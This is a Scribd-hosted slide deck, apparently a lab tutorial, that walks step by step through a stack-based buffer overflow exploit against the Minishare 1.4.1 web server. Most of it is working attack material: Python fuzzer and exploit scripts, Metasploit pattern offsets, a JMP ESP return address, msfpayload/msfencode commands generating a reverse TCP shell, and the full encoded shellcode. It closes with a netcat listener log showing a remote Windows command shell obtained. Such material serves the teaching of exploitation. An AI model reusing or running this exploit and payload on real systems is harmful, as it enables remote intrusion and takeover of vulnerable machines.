Scribd Logo
Hochladen

Willkommen bei Scribd!

  • Stack Based Buffer Overflow

    Hochgeladen von

    Grupo Inmobiliario Fox
    31 Ansichten12 Seiten

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Verfügbare Formate

    PPTX, PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Als PPTX, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    31 Ansichten12 Seiten

    Stack Based Buffer Overflow

    Hochgeladen von

    Grupo Inmobiliario Fox

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Als PPTX, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 12

    Stack Based Buffer Overflow

    Minishare 1.4.1

    Fuzzer
    #!/usr/bin/python
    import socket
    target_address="192.168.1.37"
    target_port=80

    buffer = "GET " + "\x41" * 2220 + " HTTP/1.1\r\n\r\n"


    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=sock.connect((target_address,target_port))
    sock.send(buffer)
    sock.close()

    JMP ESP

    View->Executable Modules
    shell32.dll
    View code in CPU
    Search for->Command
    JMP ESP
    7CA68265

    pattern_create.rb
    root@bt4f:~$ cd
    /pentest/exploits/framework3/tools/
    root@bt4f:/pentest/exploits/framework3/tool
    s$ ./pattern_create.rb 2220
    Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa....Cv4Cv
    5Cv6Cv7Cv8Cv9

    #!/usr/bin/python
    import socket
    target_address="192.168.1.37"
    target_port=80

    buffer = "GET "


    buffer+=
    ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa....Cv4Cv5Cv6Cv7Cv
    8Cv9")
    buffer+= " HTTP/1.1\r\n\r\n"
    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=sock.connect((target_address,target_port))
    sock.send(buffer)
    sock.close()

    offset
    root@bt4f:/pentest/exploits/framework3/tool
    s$ ./pattern_offset.rb 36684335
    1787
    root@bt4f:/pentest/exploits/framework3/tool
    s$ ./pattern_offset.rb Ch7C
    1791

    #!/usr/bin/python
    import socket
    target_address="192.168.1.37"
    target_port=80
    buffer = "GET "
    buffer+= "\x90" * 1787
    buffer+= "\x41\x41\x41\x41" # EIP Should be overwritten here
    buffer+= "\x90" * (1791 - len(buffer))
    buffer+= "\xcc" * (2220 - len(buffer)) # ESP should point here
    buffer+= " HTTP/1.1\r\n\r\n"
    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=sock.connect((target_address,target_port))
    sock.send(buffer)
    sock.close()

    7CA68265->6582A67C
    #!/usr/bin/python
    import socket
    target_address="192.168.1.37"
    target_port=80
    buffer = "GET "
    buffer+= "\x90" * 1787
    buffer+= "\x65\x82\xA6\x7C" # EIP Overwrite. Shell32.dll, XP SP2, JMP ESP,
    7CA68265.
    buffer+= "\xcc" * (2220 - len(buffer)) # ESP points here.
    buffer+= " HTTP/1.1\r\n\r\n"
    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=sock.connect((target_address,target_port))
    sock.send(buffer)
    sock.close()

    Metasploit msfpayload
    root@bt4f:~$ msfpayload
    windows/shell_reverse_tcp
    LHOST=192.168.1.35 LPORT=443 C
    root@bt4f:~$ msfpayload
    windows/shell_reverse_tcp
    LHOST=192.168.1.35 LPORT=443 R |
    msfencode -a x86 -b '\x00\x0a\x0d' -t c

    #!/usr/bin/python
    import socket
    target_address="192.168.1.37"
    target_port=80
    buffer = "GET "
    buffer+= "\x90" * 1787
    buffer+= "\x65\x82\xA6\x7C" # EIP Overwrite. Shell32.dll, XP SP2, JMP ESP, 7CA68265.
    # msfpayload windows/shell_reverse_tcp LHOST=192.168.1.35 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c - x86/shikata_ga_nai 342
    bytes
    buffer+= "\x90" * 16
    buffer+= ("\xdb\xdd\xd9\x74\x24\xf4\x2b\xc9\xb1\x4f\x58\xba\x2c\x98\x23"
    "\x27\x31\x50\x1a\x83\xe8\xfc\x03\x50\x16\xe2\xd9\x64\xcb\xae"
    "\x21\x95\x0c\xd1\xa8\x70\x3d\xc3\xce\xf1\x6c\xd3\x85\x54\x9d"
    "\x98\xcb\x4c\x16\xec\xc3\x63\x9f\x5b\x35\x4d\x20\x6a\xf9\x01"
    "\xe2\xec\x85\x5b\x37\xcf\xb4\x93\x4a\x0e\xf1\xce\xa5\x42\xaa"
    "\x85\x14\x73\xdf\xd8\xa4\x72\x0f\x57\x94\x0c\x2a\xa8\x61\xa7"
    "\x35\xf9\xda\xbc\x7d\xe1\x51\x9a\x5d\x10\xb5\xf8\xa1\x5b\xb2"
    "\xcb\x52\x5a\x12\x02\x9b\x6c\x5a\xc9\xa2\x40\x57\x13\xe3\x67"
    "\x88\x66\x1f\x94\x35\x71\xe4\xe6\xe1\xf4\xf8\x41\x61\xae\xd8"
    "\x70\xa6\x29\xab\x7f\x03\x3d\xf3\x63\x92\x92\x88\x98\x1f\x15"
    "\x5e\x29\x5b\x32\x7a\x71\x3f\x5b\xdb\xdf\xee\x64\x3b\x87\x4f"
    "\xc1\x30\x2a\x9b\x73\x1b\x23\x68\x4e\xa3\xb3\xe6\xd9\xd0\x81"
    "\xa9\x71\x7e\xaa\x22\x5c\x79\xcd\x18\x18\x15\x30\xa3\x59\x3c"
    "\xf7\xf7\x09\x56\xde\x77\xc2\xa6\xdf\xad\x45\xf6\x4f\x1e\x26"
    "\xa6\x2f\xce\xce\xac\xbf\x31\xee\xcf\x15\x44\x28\x47\x56\xff"
    "\xa3\x9c\x3e\x02\xcc\xa3\x05\x8b\x2a\xc9\x69\xda\xe5\x65\x13"
    "\x47\x7d\x14\xdc\x5d\x16\xb5\x4f\x3a\xe7\xb0\x73\x95\xb0\x95"
    "\x42\xec\x55\x0b\xfc\x46\x48\xd6\x98\xa1\xc8\x0c\x59\x2f\xd0"
    "\xc1\xe5\x0b\xc2\x1f\xe5\x17\xb6\xcf\xb0\xc1\x60\xa9\x6a\xa0"
    "\xda\x63\xc0\x6a\x8b\xf2\x2a\xad\xcd\xfb\x66\x5b\x31\x4d\xdf"
    "\x1a\x4d\x61\xb7\xaa\x36\x9c\x27\x54\xed\x25\x57\x1f\xac\x0f"
    "\xf0\xc6\x24\x12\x9d\xf8\x92\x50\x98\x7a\x17\x28\x5f\x62\x52"
    "\x2d\x1b\x24\x8e\x5f\x34\xc1\xb0\xcc\x35\xc0\xbb")
    buffer+= " HTTP/1.1\r\n\r\n"
    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=sock.connect((target_address,target_port))
    sock.send(buffer)
    sock.close()

    root@bt4f:~# nc -nvvlp 443


    listening on [any] 443 ...
    connect to [192.168.1.35] from (UNKNOWN)
    [192.168.1.37] 1101
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\Program Files\MiniShare>

    GRACIAS

    Das könnte Ihnen auch gefallen